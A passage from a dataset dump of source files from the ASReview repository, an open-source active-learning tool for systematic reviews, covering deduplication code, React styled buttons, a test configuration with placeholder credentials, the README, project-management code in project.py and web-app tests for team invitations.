s_dups_text\n else:\n s_dups = s_dups_text\n\n return s_dups\n\n def drop_duplicates(self, pid=\"doi\", inplace=False, reset_index=True):\n \"\"\"Drop duplicate records.\n\n Drop duplicates based on titles and abstracts and if available,\n on a persistent identifier (PID) such as the Digital Object Identifier\n (`DOI <https://www.doi.org/>`_).\n\n Arguments\n ---------\n pid: string, default 'doi'\n Which persistent identifier to use for deduplication.\n inplace: boolean, default False\n Whether to modify the DataFrame rather than creating a new one.\n reset_index: boolean, default True\n If True, the existing index column is reset to the default integer index.\n\n Returns\n -------\n pandas.DataFrame or None\n DataFrame with duplicates removed or None if inplace=True\n \"\"\"\n df = self.df[~self.duplicated(pid)]\n\n if reset_index:\n df = df.reset_index(drop=True)\n if inplace:\n self.df = df\n return\n return df\n" }, { "alpha_fraction": 0.6541666388511658, "alphanum_fraction": 0.6541666388511658, "avg_line_length": 26.69230842590332, "blob_id": 
"b3e3a4c94fe1766bd2ed7dc7d3612fbdbb28e055", "content_id": "fc7c0da01f150ea3b07f8ecfcfbce6179a768a5a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 720, "license_type": "permissive", "max_line_length": 74, "num_lines": 26, "path": "/asreview/webapp/src/StyledComponents/StyledButton.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { Button, IconButton } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { LoadingButton } from \"@mui/lab\";\n\nexport const StyledTextButton = styled(Button)(({ theme }) => ({\n textTransform: \"none\",\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n}));\n\nexport const StyledIconButton = styled(IconButton)(({ theme }) => ({\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n color: theme.palette.text.primary,\n },\n}));\n\nexport const StyledLoadingButton = styled(LoadingButton)(({ theme }) => ({\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n color: theme.palette.text.primary,\n },\n}));\n" }, { "alpha_fraction": 0.7134328484535217, "alphanum_fraction": 0.7223880887031555, "avg_line_length": 20, "blob_id": "6274a427c4d1d4e1d046d4a9aa371cb729bc5800", "content_id": "a2b2be0ffadaf5f5cd760d0ebc62a2457ace8643", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 335, "license_type": "permissive", "max_line_length": 37, "num_lines": 16, "path": "/asreview/webapp/tests/config/auth_verified_config.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nSECRET_KEY = \"my_very_secret_key\"\nSECURITY_PASSWORD_SALT = \"my_salt\"\nAUTHENTICATION_ENABLED = true\nALLOW_ACCOUNT_CREATION = true\nEMAIL_VERIFICATION = true\n\n[EMAIL_CONFIG]\nSERVER = \"localhost\"\nPORT = 465\nUSERNAME = \"[email protected]\"\nPASSWORD = \"secret_password\"\nUSE_TLS = false\nUSE_SSL = true\nREPLY_ADDRESS = \"[email protected]\"" }, { "alpha_fraction": 0.7540106773376465, "alphanum_fraction": 0.7782531380653381, "avg_line_length": 49.08928680419922, "blob_id": "fd887fd628cb031b0a53d37b0819bb961011c533", "content_id": "7e4b86d8f9678105fa0caca28f077c6ae1aa416e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5612, "license_type": "permissive", "max_line_length": 554, "num_lines": 112, "path": "/README.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <a href=\"https://github.com/asreview/asreview\">\n <img width=\"60%\" height=\"60%\" src=\"https://raw.githubusercontent.com/asreview/asreview-artwork/master/LogoASReview/SVG/GitHub_Repo_Card_Transparent.svg\">\n </a>\n</p>\n\n## ASReview: Active learning for Systematic Reviews\n\n[![PyPI version](https://badge.fury.io/py/asreview.svg)](https://badge.fury.io/py/asreview) [![Build Status](https://img.shields.io/endpoint.svg?url=https%3A%2F%2Factions-badge.atrox.dev%2Fasreview%2Fasreview%2Fbadge%3Fref%3Dmaster&style=flat)](https://actions-badge.atrox.dev/asreview/asreview/goto?ref=master) [![Documentation Status](https://readthedocs.org/projects/asreview/badge/?version=latest)](https://asreview.readthedocs.io/en/latest/?badge=latest) [![DOI](https://zenodo.org/badge/164874894.svg)](https://zenodo.org/badge/latestdoi/164874894)\n 
[![Downloads](https://pepy.tech/badge/asreview)](https://github.com/asreview/asreview#installation) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4755/badge)](https://bestpractices.coreinfrastructure.org/projects/4755)\n\nSystematically screening large amounts of textual data is time-consuming and\noften tiresome. The rapidly evolving field of Artificial Intelligence (AI) has\nallowed the development of AI-aided pipelines that assist in finding relevant\ntexts for search tasks. A well-established approach to increasing efficiency\nis screening prioritization via [Active\nLearning](https://asreview.readthedocs.io/en/latest/guides/activelearning.html).\n\nThe Active learning for Systematic Reviews (ASReview) project, published in\n[*Nature Machine Intelligence*](https://doi.org/10.1038/s42256-020-00287-7)\nimplements different machine learning algorithms that interactively query the\nresearcher. ASReview LAB is designed to accelerate the step of screening\ntextual data with a minimum of records to be read by a human with no or very\nfew false negatives. ASReview LAB will save time, increase the quality of\noutput and strengthen the transparency of work when screening large amounts of\ntextual data to retrieve relevant information. Active Learning will support \ndecision-making in any discipline or industry.\n\nASReview software implements three different modes:\n\n- **Oracle** :crystal_ball: Screen textual data in\n interaction with the active learning model. The reviewer is the 'oracle',\n making the labeling decisions.\n- **Exploration** :triangular_ruler: Explore or\n demonstrate ASReview LAB with a completely labeled dataset. This mode is\n suitable for teaching purposes.\n- **Simulation** :chart_with_upwards_trend: Evaluate\n the performance of active learning models on fully labeled data. Simulations\n can be run in ASReview LAB or via the command line interface with more\n advanced options.\n\n\n## Installation\n\nThe ASReview software requires Python 3.8 or later. Detailed step-by-step\ninstructions to install Python and ASReview are available for\n[Windows](https://asreview.ai/installation-guide-windows/) and\n[macOS](https://asreview.ai/installation-guide-macos/) users.\n\n```bash\npip install asreview\n```\n\nUpgrade ASReview with the following command:\n\n```bash\npip install --upgrade asreview\n```\n\nTo install ASReview LAB with Docker, see [Install with Docker](https://asreview.readthedocs.io/en/latest/installation.html).\n\n## How it works\n\n[![ASReview LAB explained - animation](https://img.youtube.com/vi/k-a2SCq-LtA/0.jpg)](https://www.youtube.com/watch?v=k-a2SCq-LtA)\n\n\n## Getting started\n\n[Getting Started with ASReview\nLAB](https://asreview.readthedocs.io/en/latest/about.html).\n\n[![ASReview LAB](https://github.com/asreview/asreview/blob/master/images/ASReviewWebApp.png?raw=true)](https://asreview.readthedocs.io/en/latest/lab/overview_lab.html \"ASReview LAB\")\n\n## Citation\n\nThe following publication in [Nature Machine\nIntelligence](https://doi.org/10.1038/s42256-020-00287-7) can be used to cite\nthe project.\n\n> van de Schoot, R., de Bruin, J., Schram, R. et al. An open source machine\n learning framework for efficient and transparent systematic reviews.\n Nat Mach Intell 3, 125–133 (2021). https://doi.org/10.1038/s42256-020-00287-7\n\nFor citing the software, please refer to the specific release of\nthe ASReview software on Zenodo https://doi.org/10.5281/zenodo.3345592. 
The menu on the\nright can be used to find the citation format of your preference.\n\nFor more scientific publications on the ASReview software, go to\n[asreview.ai/papers](https://asreview.ai/papers/).\n\n## Contact\n\nFor an overview of the team working on ASReview, see [ASReview Research Team](https://asreview.ai/about).\nASReview LAB is maintained by\n[Jonathan de Bruin](https://github.com/J535D165) and [Yongchao Terry Ma](https://github.com/terrymyc).\n\nThe best resources to find an answer to your question or ways to get in\ncontact with the team are:\n\n- Documentation - [asreview.readthedocs.io](https://asreview.readthedocs.io/)\n- Newsletter - [asreview.ai/newsletter/subscribe](https://asreview.ai/newsletter/subscribe)\n- Quick tour - [ASReview LAB quick tour](https://asreview.readthedocs.io/en/latest/lab/overview_lab.html)\n- Issues or feature requests - [ASReview issue tracker](https://github.com/asreview/asreview/issues)\n- FAQ - [ASReview Discussions](https://github.com/asreview/asreview/discussions?discussions_q=sort%3Atop)\n- Donation - [asreview.ai/donate](https://asreview.ai/donate)\n- Contact - [[email protected]](mailto:[email protected])\n\n## License\n\nThe ASReview software has an Apache 2.0 [LICENSE](LICENSE). The ASReview team\naccepts no responsibility or liability for the use of the ASReview tool or any\ndirect or indirect damages arising out of the application of the tool.\n" }, { "alpha_fraction": 0.6302521228790283, "alphanum_fraction": 0.6302521228790283, "avg_line_length": 25.44444465637207, "blob_id": "b1b1eeb41fd7cbef76e1afeeead3efb48278b8fe", "content_id": "42ab0a86b4304239a427c305e36638168dd83ca5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 238, "license_type": "permissive", "max_line_length": 64, "num_lines": 9, "path": "/asreview/webapp/src/StyledComponents/StyledMenuItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { MenuItem } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nexport const StyledMenuItem = styled(MenuItem)(({ theme }) => ({\n cursor: \"default\",\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n}));\n" }, { "alpha_fraction": 0.590429425239563, "alphanum_fraction": 0.5918527841567993, "avg_line_length": 31.238924026489258, "blob_id": "b04b14915d91acf5b2d35a65d119dc5bb964b843", "content_id": "b678033ef13ce4b44bff8a3477163ade8eae2cc7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20375, "license_type": "permissive", "max_line_length": 88, "num_lines": 632, "path": "/asreview/project.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport time\nimport zipfile\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport jsonschema\nimport numpy as np\nfrom filelock import FileLock\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.config import LABEL_NA\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.config import PROJECT_MODES\nfrom asreview.config import SCHEMA\nfrom asreview.data import ASReviewData\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import SQLiteState\nfrom asreview.utils import asreview_path\n\nPATH_PROJECT_CONFIG = \"project.json\"\nPATH_PROJECT_CONFIG_LOCK = \"project.json.lock\"\nPATH_FEATURE_MATRICES = \"feature_matrices\"\n\n\nclass ProjectError(Exception):\n pass\n\n\nclass ProjectExistsError(Exception):\n pass\n\n\nclass ProjectNotFoundError(Exception):\n pass\n\n\ndef get_project_path(folder_id):\n \"\"\"Get the project directory.\n\n Arguments\n ---------\n folder_id: str\n The id of the folder containing a project. If there is no\n authentication, the folder_id is equal to the project_id. Otherwise,\n this is equal to {project_owner_id}_{project_id}.\n \"\"\"\n return Path(asreview_path(), folder_id)\n\n\ndef project_from_id(f):\n \"\"\"Decorator that resolves a project_id into an ASReviewProject.\n\n The project_id is used to locate the project folder; the wrapped\n function receives the loaded project instead of the raw id.\n \"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n project_path = get_project_path(project_id)\n if not is_project(project_path):\n raise ProjectNotFoundError(f\"Project '{project_id}' not found\")\n project = ASReviewProject(project_path, project_id=project_id)\n return f(project, *args, **kwargs)\n\n return decorated_function\n\n\ndef get_projects(project_paths=None):\n \"\"\"Get the ASReview projects at the given paths.\n\n Arguments\n ---------\n project_paths : list[Path], optional\n List of paths to projects. 
By default all the projects in the asreview\n folder are used, by default None\n\n Returns\n -------\n list[ASReviewProject]\n Projects at the given project paths.\n \"\"\"\n if project_paths is None:\n project_paths = [path for path in asreview_path().iterdir() if path.is_dir()]\n\n return [ASReviewProject(project_path) for project_path in project_paths]\n\n\ndef is_project(project_path):\n project_path = Path(project_path) / PATH_PROJECT_CONFIG\n\n return project_path.exists()\n\n\ndef is_v0_project(project_path):\n \"\"\"Check if a project file is of a ASReview version 0 project.\"\"\"\n\n return not Path(project_path, \"reviews\").exists()\n\n\n@contextmanager\ndef open_state(asreview_obj, review_id=None, read_only=True):\n \"\"\"Initialize a state class instance from a project folder.\n\n Arguments\n ---------\n asreview_obj: str/pathlike/ASReviewProject\n Filepath to the (unzipped) project folder or ASReviewProject object.\n review_id: str\n Identifier of the review from which the state will be instantiated.\n If none is given, the first review in the reviews folder will be taken.\n read_only: bool\n Whether to open in read_only mode.\n\n Returns\n -------\n SQLiteState\n \"\"\"\n\n # Unzip the ASReview data if needed.\n if isinstance(asreview_obj, ASReviewProject):\n project = asreview_obj\n elif zipfile.is_zipfile(asreview_obj) and Path(asreview_obj).suffix == \".asreview\":\n if not read_only:\n raise ValueError(\"ASReview files do not support not read only files.\")\n\n # work from a temp dir\n tmpdir = tempfile.TemporaryDirectory()\n project = ASReviewProject.load(asreview_obj, tmpdir.name)\n else:\n project = ASReviewProject(asreview_obj)\n\n # init state class\n state = SQLiteState(read_only=read_only)\n\n try:\n if len(project.reviews) > 0:\n if review_id is None:\n review_id = project.config[\"reviews\"][0][\"id\"]\n logging.debug(f\"Opening review {review_id}.\")\n state._restore(project.project_path, review_id)\n elif len(project.reviews) == 0 and not read_only:\n review_id = uuid4().hex\n logging.debug(f\"Create new review (state) with id {review_id}.\")\n state._create_new_state_file(project.project_path, review_id)\n project.add_review(review_id)\n else:\n raise StateNotFoundError(\n \"State file does not exist, and in \" \"read only mode.\"\n )\n yield state\n finally:\n try:\n state.close()\n except AttributeError:\n # file seems to be closed, do nothing\n pass\n\n\nclass ASReviewProject:\n \"\"\"Project class for ASReview project files.\"\"\"\n\n def __init__(self, project_path, project_id=None):\n self.project_path = Path(project_path)\n self.project_id = project_id\n\n @classmethod\n def create(\n cls,\n project_path,\n project_id=None,\n project_mode=\"oracle\",\n project_name=None,\n project_description=None,\n project_authors=None,\n ):\n \"\"\"Initialize the necessary files specific to the web app.\"\"\"\n\n project_path = Path(project_path)\n\n if is_project(project_path):\n raise ProjectExistsError(\"Project already exists.\")\n\n if project_mode not in PROJECT_MODES:\n raise ValueError(\n f\"Project mode '{project_mode}' is not in \" f\"{PROJECT_MODES}.\"\n )\n\n if project_id is None:\n project_id = project_path.stem\n\n if project_name is None:\n project_name = project_path.stem\n\n if project_path.is_dir():\n raise IsADirectoryError(f\"Project folder {project_path} already exists.\")\n\n try:\n project_path.mkdir(parents=True, exist_ok=True)\n Path(project_path, \"data\").mkdir(exist_ok=True)\n Path(project_path, 
PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n Path(project_path, \"reviews\").mkdir(exist_ok=True)\n\n config = {\n \"version\": get_versions()[\"version\"],\n \"id\": project_id,\n \"mode\": project_mode,\n \"name\": project_name,\n \"description\": project_description,\n \"authors\": project_authors,\n \"created_at_unix\": int(time.time()),\n \"datetimeCreated\": str(datetime.now()),\n \"reviews\": [],\n \"feature_matrices\": [],\n }\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n project_fp = Path(project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n # create a file with project info\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n except Exception as err:\n # remove all generated folders and raise error\n shutil.rmtree(project_path)\n raise err\n\n return cls(project_path, project_id=project_id)\n\n @property\n def config(self):\n try:\n return self._config\n except AttributeError:\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n try:\n with lock:\n # read the file with project info\n with open(project_fp, \"r\") as fp:\n config = json.load(fp)\n self._config = config\n\n return config\n\n except FileNotFoundError:\n raise ProjectNotFoundError(f\"Project '{self.project_path}' not found\")\n\n @config.setter\n def config(self, config):\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n self._config = config\n\n def update_config(self, **kwargs):\n \"\"\"Update project info\"\"\"\n\n kwargs_copy = kwargs.copy()\n\n # validate schema\n if \"mode\" in kwargs_copy and kwargs_copy[\"mode\"] not in PROJECT_MODES:\n raise ValueError(\"Project mode '{}' not found.\".format(kwargs_copy[\"mode\"]))\n\n # update project file\n config = self.config\n config.update(kwargs_copy)\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n self.config = config\n return config\n\n def add_dataset(self, file_name):\n \"\"\"Add file path to the project file.\n\n Add file to data subfolder and fill the pool of iteration 0.\n \"\"\"\n self.update_config(dataset_path=file_name)\n\n # fill the pool of the first iteration\n fp_data = Path(self.project_path, \"data\", self.config[\"dataset_path\"])\n as_data = ASReviewData.from_file(fp_data)\n\n with open_state(self.project_path, read_only=False) as state:\n # save the record ids in the state file\n state.add_record_table(as_data.record_ids)\n\n # if the data contains labels, add them to the state file\n if (\n self.config[\"mode\"] != PROJECT_MODE_SIMULATE\n and as_data.labels is not None\n ):\n labeled_indices = np.where(as_data.labels != LABEL_NA)[0]\n labels = as_data.labels[labeled_indices].tolist()\n labeled_record_ids = as_data.record_ids[labeled_indices].tolist()\n\n # add the labels as prior data\n state.add_labeling_data(\n record_ids=labeled_record_ids,\n labels=labels,\n notes=[None for _ in labeled_record_ids],\n prior=True,\n )\n\n def remove_dataset(self):\n \"\"\"Remove dataset from project.\"\"\"\n # reset dataset_path\n self.update_config(dataset_path=None)\n\n # remove datasets from project\n 
shutil.rmtree(Path(self.project_path, \"data\"))\n\n # remove state file if present\n if Path(self.project_path, \"reviews\").is_dir() and any(\n Path(self.project_path, \"reviews\").iterdir()\n ):\n self.delete_review()\n\n def clean_tmp_files(self):\n \"\"\"Clean temporary files in a project.\n\n Arguments\n ---------\n project_id: str\n The id of the current project.\n \"\"\"\n\n # clean pickle files\n for f_pickle in self.project_path.rglob(\"*.pickle\"):\n try:\n os.remove(f_pickle)\n except OSError as e:\n print(f\"Error: {f_pickle} : {e.strerror}\")\n\n @property\n def feature_matrices(self):\n try:\n return self.config[\"feature_matrices\"]\n except Exception:\n return []\n\n def add_feature_matrix(self, feature_matrix, feature_extraction_method):\n \"\"\"Add feature matrix to project file.\n\n Arguments\n ---------\n feature_matrix: numpy.ndarray, scipy.sparse.csr.csr_matrix\n The feature matrix to add to the project file.\n feature_extraction_method: str\n Name of the feature extraction method.\n \"\"\"\n # Make sure the feature matrix is in csr format.\n if isinstance(feature_matrix, np.ndarray):\n feature_matrix = csr_matrix(feature_matrix)\n if not isinstance(feature_matrix, csr_matrix):\n raise ValueError(\n \"The feature matrix should be convertible to type \"\n \"scipy.sparse.csr.csr_matrix.\"\n )\n\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n save_npz(\n Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename),\n feature_matrix,\n )\n\n # Add the feature matrix to the project config.\n config = self.config\n\n feature_matrix_config = {\n \"id\": feature_extraction_method,\n \"filename\": matrix_filename,\n }\n\n # Add container for feature matrices.\n if \"feature_matrices\" not in config:\n config[\"feature_matrices\"] = []\n\n config[\"feature_matrices\"].append(feature_matrix_config)\n\n self.config = config\n\n def get_feature_matrix(self, feature_extraction_method):\n \"\"\"Get the feature matrix from the project file.\n\n Arguments\n ---------\n feature_extraction_method: str\n Name of the feature extraction method for which to get the matrix.\n\n Returns\n -------\n scipy.sparse.csr_matrix:\n Feature matrix in sparse format.\n \"\"\"\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n return load_npz(Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename))\n\n @property\n def reviews(self):\n try:\n return self.config[\"reviews\"]\n except Exception:\n return []\n\n def add_review(self, review_id, start_time=None, status=\"setup\"):\n \"\"\"Add new review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n\n \"\"\"\n if start_time is None:\n start_time = datetime.now()\n\n # Add the review to the project.\n config = self.config\n\n review_config = {\n \"id\": review_id,\n \"start_time\": str(start_time),\n \"status\": status\n # \"end_time\": datetime.now()\n }\n\n # add container for reviews\n if \"reviews\" not in config:\n config[\"reviews\"] = []\n\n config[\"reviews\"].append(review_config)\n\n self.config = config\n\n def update_review(self, review_id=None, **kwargs):\n \"\"\"Update review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4. Default None, which is the\n first added review.\n status: str\n The status of the review. 
One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n end_time: End time of the review.\n \"\"\"\n\n # read the file with project info\n config = self.config\n\n if review_id is None:\n review_index = 0\n else:\n review_index = [x[\"id\"] for x in self.config[\"reviews\"]].index(review_id)\n\n review_config = config[\"reviews\"][review_index]\n review_config.update(kwargs)\n\n config[\"reviews\"][review_index] = review_config\n\n # update the file with project info\n self.config = config\n\n def delete_review(self, remove_folders=False):\n try:\n # remove the folder tree\n shutil.rmtree(Path(self.project_path, PATH_FEATURE_MATRICES))\n\n # recreate folder structure if True\n if not remove_folders:\n Path(self.project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove feature matrices.\")\n\n try:\n path_review = Path(self.project_path, \"reviews\")\n shutil.rmtree(path_review)\n if not remove_folders:\n Path(self.project_path, \"reviews\").mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove sql database.\")\n\n # update the config\n self.update_config(**{\"reviews\": [], \"feature_matrices\": []})\n\n def mark_review_finished(self, review_id=None):\n \"\"\"Mark a review in the project as finished.\n\n If no review_id is given, mark the first review as finished.\n\n Arguments\n ---------\n review_id: str\n Identifier of the review to mark as finished.\n \"\"\"\n\n self.update_review(\n review_id=review_id, status=\"finished\", end_time=str(datetime.now())\n )\n\n def export(self, export_fp):\n if Path(export_fp).suffix != \".asreview\":\n raise ValueError(\"Export file should have .asreview extension.\")\n\n if Path(export_fp) == Path(self.project_path):\n raise ValueError(\"export_fp should not be identical to project path.\")\n\n export_fp_tmp = Path(export_fp).with_suffix(\".asreview.zip\")\n\n # copy the source tree, but ignore pickle files\n shutil.copytree(\n self.project_path,\n export_fp_tmp,\n ignore=shutil.ignore_patterns(\"*.pickle\", \"*.lock\"),\n )\n\n # create the archive\n shutil.make_archive(export_fp_tmp, \"zip\", root_dir=export_fp_tmp)\n\n # remove the unzipped folder and move zip\n shutil.rmtree(export_fp_tmp)\n shutil.move(f\"{export_fp_tmp}.zip\", export_fp)\n\n @classmethod\n def load(cls, asreview_file, project_path, safe_import=False):\n tmpdir = tempfile.TemporaryDirectory().name\n\n try:\n # Unzip the project file\n with zipfile.ZipFile(asreview_file, \"r\") as zip_obj:\n zip_filenames = zip_obj.namelist()\n\n # raise error if no ASReview project file\n if PATH_PROJECT_CONFIG not in zip_filenames:\n raise ValueError(\"Project file is not valid project.\")\n\n # extract all files to folder\n for f in zip_filenames:\n if not f.endswith(\".pickle\"):\n zip_obj.extract(f, path=tmpdir)\n\n except zipfile.BadZipFile:\n raise ValueError(\"File is not an ASReview file.\")\n\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r\") as f:\n project_config = json.load(f)\n\n if safe_import:\n # assign a new id to the project.\n project_config[\"id\"] = uuid4().hex\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r+\") as f:\n # write to file\n f.seek(0)\n json.dump(project_config, f)\n f.truncate()\n\n # location to copy file to\n # Move the project from the temp folder to the projects folder.\n os.replace(tmpdir, Path(project_path, project_config[\"id\"]))\n\n return cls(Path(project_path, project_config[\"id\"]))\n\n def set_error(self, err, save_error_message=True):\n err_type = 
type(err).__name__\n self.update_review(status=\"error\")\n\n # write error to file if label method is prior (first iteration)\n if save_error_message:\n message = {\n \"message\": f\"{err_type}: {err}\",\n \"type\": f\"{err_type}\",\n \"datetime\": str(datetime.now()),\n }\n\n with open(Path(self.project_path, \"error.json\"), \"w\") as f:\n json.dump(message, f)\n\n def remove_error(self, status):\n error_path = self.project_path / \"error.json\"\n if error_path.exists():\n try:\n os.remove(error_path)\n except Exception as err:\n raise ValueError(f\"Failed to clear the error. {err}\")\n self.update_review(status=status)\n" }, { "alpha_fraction": 0.6550622582435608, "alphanum_fraction": 0.6743417382240295, "avg_line_length": 31.768953323364258, "blob_id": "df45ca3dd5ca5f87d935b6b7671cc5563043a249", "content_id": "ed99aaababbb38fd7be81f4ce1b9d9f199f11d56", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9077, "license_type": "permissive", "max_line_length": 76, "num_lines": 277, "path": "/asreview/webapp/tests/test_api/test_teams.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from inspect import getfullargspec\n\nimport pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\n\n# NOTE: user 1 is signed in and has a single project, invites\n# other users who accept and reject\n\n\n# Test sending an invitation\ndef test_user1_sends_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n status_code, resp_data = au.invite(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == 'User \"[email protected]\" invited.'\n\n\n# Testing listing invitations\ndef test_user2_list_invitations(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # get all invitations\n status_code, resp_data = au.list_invitations(client)\n invitations = resp_data[\"invited_for_projects\"]\n assert status_code == 200\n assert len(invitations) == 1\n assert invitations[0][\"project_id\"] == project.project_id\n assert invitations[0][\"owner_id\"] == user1.id\n\n\n# Testing accepting an invitation\ndef test_user2_accept_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation\n status_code, resp_data = au.accept_invitation(client, project)\n assert status_code == 200\n assert resp_data[\"message\"] == \"User accepted invitation for project.\"\n\n\n# Test rejecting invitation\ndef test_user2_rejects_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # reject invitation\n status_code, resp_data = au.reject_invitation(client, project)\n assert status_code == 200\n assert resp_data[\"message\"] == \"User rejected invitation for project.\"\n\n\n# Test owner removes invitation\ndef test_owner_deletes_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # remove invitation\n status_code, resp_data = au.delete_invitation(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Owner deleted 
invitation.\"\n\n\n# Test owner views collaboration team\ndef test_view_collaboration_team_with_pending_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # checks team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 200\n assert resp_data[\"collaborators\"] == []\n assert resp_data[\"invitations\"] == [user2.id]\n\n\n# Test owner views collaboration team\ndef test_view_collaboration_team_with_accepted_invitation(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 1 signs up\n au.signin_user(client, user1)\n # checks team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 200\n assert resp_data[\"collaborators\"] == [user2.id]\n assert resp_data[\"invitations\"] == []\n\n\n# Test owner removes collaboration\ndef test_owner_deletes_collaboration(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 1 signs up\n au.signin_user(client, user1)\n # remove from team\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Collaborator removed from project.\"\n\n\n# Test collaborator withdraws from collaboration\ndef test_collaborator_withdrawal(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n # withdrawal\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Collaborator removed from project.\"\n\n\n# ###################\n# TEST LOGIN REQUIRED\n# ###################\n\n\[email protected](\n \"api_call\",\n [\n au.invite,\n au.list_invitations,\n au.list_collaborators,\n au.accept_invitation,\n au.reject_invitation,\n au.delete_invitation,\n au.delete_collaboration,\n ],\n)\n# Test login required for all api routes\ndef test_login_required(setup_auth, api_call):\n client, _, user2, _, project = setup_auth\n au.signout_user(client)\n number_of_params = 